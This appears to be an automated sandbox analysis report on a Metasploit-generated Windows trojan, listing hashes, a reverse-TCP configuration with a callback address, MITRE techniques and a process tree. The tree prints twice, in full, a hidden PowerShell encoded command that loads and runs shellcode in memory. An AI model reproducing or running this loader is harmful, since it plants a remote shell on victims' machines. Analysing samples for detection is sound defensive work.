metasploit | b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c

General

Target

b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe
Size

17KB
MD5

a1482109c91e7108d52a1f1ad15f8a7e
SHA1

075511343282d82f2910e430fb74ec43fc4c11e6
SHA256

b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c
SHA512

fbf5208dafd788c7183ea02af9c56767905e6b303a6b57e6e1eea40a5865fb72368d363fbcf2fd67af33a94ab732cab20e00985f574088f851592f3c8273da28
SSDEEP

384:ZEEoLO56ayzcMj+M+XLpZ5NzylYg3w+awmc48EJaB5:GE8O56lcVM+XSYg3w+ucKaB5

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.74:443

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2124	powershell.exe
2844	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2108	2440	b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe	29
PID 2440 wrote to memory of 2108	2440	b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe	29
PID 2440 wrote to memory of 2108	2440	b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe	29
PID 2108 wrote to memory of 2124	2108	cmd.exe	30
PID 2108 wrote to memory of 2124	2108	cmd.exe	30
PID 2108 wrote to memory of 2124	2108	cmd.exe	30
PID 2124 wrote to memory of 2844	2124	powershell.exe	31
PID 2124 wrote to memory of 2844	2124	powershell.exe	31
PID 2124 wrote to memory of 2844	2124	powershell.exe	31
PID 2124 wrote to memory of 2844	2124	powershell.exe	31
PID 2844 wrote to memory of 2200	2844	powershell.exe	32
PID 2844 wrote to memory of 2200	2844	powershell.exe	32
PID 2844 wrote to memory of 2200	2844	powershell.exe	32
PID 2844 wrote to memory of 2200	2844	powershell.exe	32
PID 2200 wrote to memory of 1260	2200	csc.exe	33
PID 2200 wrote to memory of 1260	2200	csc.exe	33
PID 2200 wrote to memory of 1260	2200	csc.exe	33
PID 2200 wrote to memory of 1260	2200	csc.exe	33

C:\Users\Admin\AppData\Local\Temp\b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe
"C:\Users\Admin\AppData\Local\Temp\b10673aae9980b1ab66a26e6330e2715c4beeeae2d4ff9ccc9fc9c1de8b8fb6c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA4AHMAUAB5ACAAPQAgACcAJABGAGMAbAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABGAGMAbAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGQALAAwAHgAYwAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiADgALAAwAHgANwA5ACwAMAB4AGMANwAsADAAeABmADgALAAwAHgAYgAzACwAMAB4ADUAYgAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQAMwAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADMAYQAsADAAeABkADQALAAwAHgAMQBhACwAMAB4ADQANgAsADAAeAA0ADAALAAwAHgAMwAyACwAMAB4ADUANQAsADAAeABhADkALAAwAHgAYgA4ACwAMAB4AGMAMwAsADAAeAAwAGEALAAwAHgAOQBiACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4AGIAZgAsADAAeAAwADEALAAwAHgAMQBmACwAMAB4ADgAMAAsADAAeABjAGIALAAwAHgANAA3ACwAMAB4AGEAYwAsADAAeAA2AGIALAAwAHgAOQA5ACwAMAB4ADcAMwAsADAAeAAyADcALAAwAHgAMQA5ACwAMAB4ADMANgAsADAAeAA3ADQALAAwAHgAOAAwACwAMAB4ADkANAAsADAAeAA2ADAALAAwAHgAYgBiACwAMAB4ADEAMQAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4ADEANwAsADAAeABkADEALAAwAHgAMwBiACwAMAB4ADUAMQAsADAAeAA2ADUALAAwAHgAMAA2ACwAMAB4ADkAYwAsADAAeAA2ADgALAAwAHgAYQA2ACwAMAB4ADUAYgAsADAAeABkAGQALAAwAHgAYQBkACwAMAB4ADcAMQAsADAAeAAxADEALAAwAHgAMwAyACwAMAB4ADYAMwAsADAAeABkADYALAAwAHgANQAyACwAMAB4ADkAZQAsADAAeAA5ADQALAAwAHgANQAzACwAMAB4ADIANgAsADAAeAAyADMALAAwAHgAOQA0ACwAMAB4AGIAMwAsADAAeAAyAGMALAAwAHgAMQBiACwAMAB4AGUAZQAsADAAeABiADYALAAwAHgAZgAzACwAMAB4AGUAOAAsADAAeAA0ADIALAAwAHgAYgA5ACwAMAB4ADIAMwAsADAAeAA0ADAALAAwAHgAZAAwACwAMAB4AGUAMQAsADAAeABlADMALAAwAHgAZQBhACwAMAB4AGEAZQAsADAAeAAwADkALAAwAHgAZQA1ACwAMAB4ADMAZgAsADAAeABhAGIALAAwAHgAZQAwACwAMAB4ADkAMQAsADAAeAA4ADMALAAwAHgAZgBkACwAMAB4AGMAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4AGMAOQAsADAAeABhADgALAAwAHgANQA4ACwAMAB4ADUAZQAsADAAeAAwADMALAAwAHgANgBlACwAMAB4ADkAYgAsADAAeAA5ADEALAAwAHgANgA5ACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeABmAGEALAAwAHgANgBiACwAMAB4ADAAMQAsADAAeABhADkALAAwAHgAOAA3ACwAMAB4ADYAYgAsADAAeABkADIALAAwAHgAZAAzACwAMAB4ADUAMwAsADAAeABmADkALAAwAHgAYwA1ACwAMAB4ADcANAAsADAAeAAxADAALAAwAHgANQA5ACwAMAB4ADIAMgAsADAAeAA4ADQALAAwAHgAZgA1ACwAMAB4ADMAYwAsADAAeABhADEALAAwAHgAOABhACwAMAB4AGIAMgAsADAAeAA0AGIALAAwAHgAZQBkACwAMAB4ADgAZQAsADAAeAA0ADUALAAwAHgAOQBmACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAA0AGEALAAwAHgAMwBhACwAMAB4ADkANAAsADAAeAAwADQALAAwAHgANABlACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAMgA0ACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAMwBlACwAMAB4ADUAOQAsADAAeAAwADcALAAwAHgAYQBhACwAMAB4ADkAZgAsADAAeABmAGYALAAwAHgANAAzACwAMAB4ADUAOQAsADAAeABmADYALAAwAHgAOAAwACwAMAB4AGEAYgAsADAAeABhADEALAAwAHgAZgA3ACwAMAB4AGQAYwAsADAAeAAzAGIALAAwAHgANgBkACwAMAB4ADMANQAsADAAeABkAGYALAAwAHgAYgBiACwAMAB4AGYAOQAsADAAeAA0AGUALAAwAHgAYQBjACwAMAB4ADgAOQAsADAAeABhADYALAAwAHgAZQA0ACwAMAB4ADMAYQAsADAAeABhADIALAAwAHgAMgBmACwAMAB4ADIAMgAsADAAeABiAGMALAAwAHgAYgAzACwAMAB4ADMAOAAsADAAeABkADUALAAwAHgAMQAyACwAMAB4ADcAYgAsADAAeAAyADgALAAwAHgAMgA4ACwAMAB4ADkAMwAsADAAeAA3AGMALAAwAHgANgAwACwAMAB4AGUAZQAsADAAeABjADcALAAwAHgAMgBjACwAMAB4ADEAYQAsADAAeABjADcALAAwAHgANgA3ACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgAZQA4ACwAMAB4AGIAZAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADcAZQAsADAAeABmAGUALAAwAHgAMABiACwAMAB4AGUANAAsADAAeAAzADQALAAwAHgAOQA2ACwAMAB4ADQAOQAsADAAeABlADcALAAwAHgAYwA5ACwAMAB4AGQAZAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADkAOQAsADAAeAA3ADEALAAwAHgAOAA4ACwAMAB4ADkAZAAsADAAeAA1ADkALAAwAHgAMgAyACwAMAB4ADYAOAAsADAAeAA0AGUALAAwAHgAMwAxACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgAYgAxACwAMAB4ADIAMQAsADAAeAA1ADMALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABjAGIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADIALAAwAHgANgAzACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgANAA4ACwAMAB4ADEAMgAsADAAeABhADkALAAwAHgAOQBmACwAMAB4ADMANAAsADAAeAAxADQALAAwAHgAMgAxACwAMAB4ADIAYwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgAZABhACwAMAB4ADgAYQAsADAAeAAyADIALAAwAHgAMQA0ACwAMAB4ADgAMAAsADAAeAAxAGMALAAwAHgAMwBjACwAMAB4ADgAMgAsADAAeABhAGYALAAwAHgAYQAwACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgANgA2ACwAMAB4AGYANwAsADAAeAA0ADQALAAwAHgAMwAwACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAYwBiACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAMwA0ACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgANwA1ACwAMAB4ADIAMgAsADAAeAAyAGIALAAwAHgAOABlACwAMAB4ADcANQAsADAAeABiADIALAAwAHgANwBkACwAMAB4AGMANAAsADAAeAA3ADUALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeABiAGMALAAwAHgAMgA1ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgANgA5ACwAMAB4ADUAYQAsADAAeABhAGMALAAwAHgAYgAzACwAMAB4ADkAMgAsADAAeAAwAGIALAAwAHgAMAAxACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYgAxACwAMAB4ADcAYwAsADAAeAA1ADMALAAwAHgAYQA0ACwAMAB4ADQAYQAsADAAeABhAGIALAAwAHgANgA1ACwAMAB4ADkAOAAsADAAeAA5AGMALAAwAHgAOQA1ACwAMAB4ADEAMwAsADAAeABmADAALAAwAHgAMQBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABhAEoARQBrAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABhAEoARQBrAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAEoARQBrACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAOABzAFAAeQApACkAOwAkAEgARABBAHcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAFUAMQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAFUAMQAgACQASABEAEEAdwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABIAEQAQQB3ACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAA4AHMAUAB5ACAAPQAgACcAJABGAGMAbAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABGAGMAbAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGQALAAwAHgAYwAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiADgALAAwAHgANwA5ACwAMAB4AGMANwAsADAAeABmADgALAAwAHgAYgAzACwAMAB4ADUAYgAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQAMwAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADMAYQAsADAAeABkADQALAAwAHgAMQBhACwAMAB4ADQANgAsADAAeAA0ADAALAAwAHgAMwAyACwAMAB4ADUANQAsADAAeABhADkALAAwAHgAYgA4ACwAMAB4AGMAMwAsADAAeAAwAGEALAAwAHgAOQBiACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAMgBmACwAMAB4AGIAZgAsADAAeAAwADEALAAwAHgAMQBmACwAMAB4ADgAMAAsADAAeABjAGIALAAwAHgANAA3ACwAMAB4AGEAYwAsADAAeAA2AGIALAAwAHgAOQA5ACwAMAB4ADcAMwAsADAAeAAyADcALAAwAHgAMQA5ACwAMAB4ADMANgAsADAAeAA3ADQALAAwAHgAOAAwACwAMAB4ADkANAAsADAAeAA2ADAALAAwAHgAYgBiACwAMAB4ADEAMQAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4ADEANwAsADAAeABkADEALAAwAHgAMwBiACwAMAB4ADUAMQAsADAAeAA2ADUALAAwAHgAMAA2ACwAMAB4ADkAYwAsADAAeAA2ADgALAAwAHgAYQA2ACwAMAB4ADUAYgAsADAAeABkAGQALAAwAHgAYQBkACwAMAB4ADcAMQAsADAAeAAxADEALAAwAHgAMwAyACwAMAB4ADYAMwAsADAAeABkADYALAAwAHgANQAyACwAMAB4ADkAZQAsADAAeAA5ADQALAAwAHgANQAzACwAMAB4ADIANgAsADAAeAAyADMALAAwAHgAOQA0ACwAMAB4AGIAMwAsADAAeAAyAGMALAAwAHgAMQBiACwAMAB4AGUAZQAsADAAeABiADYALAAwAHgAZgAzACwAMAB4AGUAOAAsADAAeAA0ADIALAAwAHgAYgA5ACwAMAB4ADIAMwAsADAAeAA0ADAALAAwAHgAZAAwACwAMAB4AGUAMQAsADAAeABlADMALAAwAHgAZQBhACwAMAB4AGEAZQAsADAAeAAwADkALAAwAHgAZQA1ACwAMAB4ADMAZgAsADAAeABhAGIALAAwAHgAZQAwACwAMAB4ADkAMQAsADAAeAA4ADMALAAwAHgAZgBkACwAMAB4AGMAMwAsADAAeABhADYALAAwAHgANwA3ACwAMAB4AGMAOQAsADAAeABhADgALAAwAHgANQA4ACwAMAB4ADUAZQAsADAAeAAwADMALAAwAHgANgBlACwAMAB4ADkAYgAsADAAeAA5ADEALAAwAHgANgA5ACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeABmAGEALAAwAHgANgBiACwAMAB4ADAAMQAsADAAeABhADkALAAwAHgAOAA3ACwAMAB4ADYAYgAsADAAeABkADIALAAwAHgAZAAzACwAMAB4ADUAMwAsADAAeABmADkALAAwAHgAYwA1ACwAMAB4ADcANAAsADAAeAAxADAALAAwAHgANQA5ACwAMAB4ADIAMgAsADAAeAA4ADQALAAwAHgAZgA1ACwAMAB4ADMAYwAsADAAeABhADEALAAwAHgAOABhACwAMAB4AGIAMgAsADAAeAA0AGIALAAwAHgAZQBkACwAMAB4ADgAZQAsADAAeAA0ADUALAAwAHgAOQBmACwAMAB4ADgANQAsADAAeABhAGIALAAwAHgAYwBlACwAMAB4ADEAZQAsADAAeAA0AGEALAAwAHgAMwBhACwAMAB4ADkANAAsADAAeAAwADQALAAwAHgANABlACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAMgA0ACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAMwBlACwAMAB4ADUAOQAsADAAeAAwADcALAAwAHgAYQBhACwAMAB4ADkAZgAsADAAeABmAGYALAAwAHgANAAzACwAMAB4ADUAOQAsADAAeABmADYALAAwAHgAOAAwACwAMAB4AGEAYgAsADAAeABhADEALAAwAHgAZgA3ACwAMAB4AGQAYwAsADAAeAAzAGIALAAwAHgANgBkACwAMAB4ADMANQAsADAAeABkAGYALAAwAHgAYgBiACwAMAB4AGYAOQAsADAAeAA0AGUALAAwAHgAYQBjACwAMAB4ADgAOQAsADAAeABhADYALAAwAHgAZQA0ACwAMAB4ADMAYQAsADAAeABhADIALAAwAHgAMgBmACwAMAB4ADIAMgAsADAAeABiAGMALAAwAHgAYgAzACwAMAB4ADMAOAAsADAAeABkADUALAAwAHgAMQAyACwAMAB4ADcAYgAsADAAeAAyADgALAAwAHgAMgA4ACwAMAB4ADkAMwAsADAAeAA3AGMALAAwAHgANgAwACwAMAB4AGUAZQAsADAAeABjADcALAAwAHgAMgBjACwAMAB4ADEAYQAsADAAeABjADcALAAwAHgANgA3ACwAMAB4AGEANwAsADAAeABkAGEALAAwAHgAZQA4ACwAMAB4AGIAZAAsADAAeAA1ADIALAAwAHgAZAAxACwAMAB4ADcAZQAsADAAeABmAGUALAAwAHgAMABiACwAMAB4AGUANAAsADAAeAAzADQALAAwAHgAOQA2ACwAMAB4ADQAOQAsADAAeABlADcALAAwAHgAYwA5ACwAMAB4AGQAZAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADkAOQAsADAAeAA3ADEALAAwAHgAOAA4ACwAMAB4ADkAZAAsADAAeAA1ADkALAAwAHgAMgAyACwAMAB4ADYAOAAsADAAeAA0AGUALAAwAHgAMwAxACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgAYgAxACwAMAB4ADIAMQAsADAAeAA1ADMALAAwAHgAYQBkACwAMAB4AGQAYQAsADAAeABjAGIALAAwAHgAYgBjACwAMAB4ADEAOAAsADAAeABiADIALAAwAHgANgAzACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgANAA4ACwAMAB4ADEAMgAsADAAeABhADkALAAwAHgAOQBmACwAMAB4ADMANAAsADAAeAAxADQALAAwAHgAMgAxACwAMAB4ADIAYwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgAZABhACwAMAB4ADgAYQAsADAAeAAyADIALAAwAHgAMQA0ACwAMAB4ADgAMAAsADAAeAAxAGMALAAwAHgAMwBjACwAMAB4ADgAMgAsADAAeABhAGYALAAwAHgAYQAwACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgANgA2ACwAMAB4AGYANwAsADAAeAA0ADQALAAwAHgAMwAwACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAYwBiACwAMAB4AGMAYgAsADAAeAA4AGEALAAwAHgAMwA0ACwAMAB4AGMAMgAsADAAeAA1ADkALAAwAHgANwA1ACwAMAB4ADIAMgAsADAAeAAyAGIALAAwAHgAOABlACwAMAB4ADcANQAsADAAeABiADIALAAwAHgANwBkACwAMAB4AGMANAAsADAAeAA3ADUALAAwAHgAZABhACwAMAB4AGQAOQAsADAAeABiAGMALAAwAHgAMgA1ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgANgA5ACwAMAB4ADUAYQAsADAAeABhAGMALAAwAHgAYgAzACwAMAB4ADkAMgAsADAAeAAwAGIALAAwAHgAMAAxACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYgAxACwAMAB4ADcAYwAsADAAeAA1ADMALAAwAHgAYQA0ACwAMAB4ADQAYQAsADAAeABhAGIALAAwAHgANgA1ACwAMAB4ADkAOAAsADAAeAA5AGMALAAwAHgAOQA1ACwAMAB4ADEAMwAsADAAeABmADAALAAwAHgAMQBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABhAEoARQBrAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABhAEoARQBrAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAEoARQBrACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAOABzAFAAeQApACkAOwAkAEgARABBAHcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAFUAMQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAFUAMQAgACQASABEAEEAdwAgACQAZQAiAH0AZQBsAHM